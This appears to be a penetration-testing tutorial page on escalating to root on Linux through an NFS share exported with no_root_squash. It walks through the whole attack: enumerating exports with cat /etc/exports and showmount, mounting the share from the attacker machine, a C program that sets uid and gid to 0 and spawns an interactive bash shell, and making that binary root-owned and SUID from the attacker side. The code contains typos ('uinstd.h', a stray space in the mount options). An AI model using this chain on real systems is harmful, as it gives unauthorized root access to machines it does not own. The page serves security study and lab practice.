Skip to content

Introduction#

The compromised machine may be configured to allow certain directories to be mounted by other machines. You can enumerate such directories by running the following command on the victim machine:

cat /etc/exports

![[res/Enumerate Mountable Directories.png]]

You can additionally verify this from your attacker machine by running:

showmount -e <victim IP>

![[res/Confirm Mountable Directories.png]]

If there is a mountable directory which is configured as no_root_squash, as is the case here, then it can be used for privilege escalation.

We begin by mounting the target directory from the victim to a directory on our machine:

sudo mount -o rw, vers=3 <victim IP>:/tmp /tmp/root_squash

Now, if no_root_sqaush is configured for the mountable directory, then the root user on the attacker machine will get mirrored on the victim machine. In essence, any command run as root on the attacker machine, will also be executed as root on the victim! This can allow us to create a malicious binary in the mounted directory and set its SUID bit from the attacker machine. This action will be mirrored by the victim and we will essentially have an SUID binary on the target which is all under our control.

Let's write a simple malicious C executable:

#include <uinstd.h>
#include <stdlib.h>

int main()
{
    setuid(0); // Set user ID to root
    setgid(0); // Set group ID to root
    system("/bin/bash -i"); // Execute bash now with elevated privileges

    return 0;
}

It doesn't matter if you create it on the target or the attacker machine, but you must compile it on the target machine in order to avoid library version mismatches:

gcc -o nfs_exploit nfs_exploit.c

![[res/Compile On Target.png]]

Next, you want to change the ownership of the compiled binary to root on the attacker machine. Afterwards, you want to set the SUID bit on the binary, once again, from the attacker machine:

sudo chown root:root nfs_exploit
sudo chmod +s nfs_exploit

![[res/Change Ownership and Permission on the Attacking Machine.png]]

![[res/Ownership and Permissions from the Target's POV.png]]

Finally, execute the malicious binary on the target:

![[res/NFS Exploit.png]]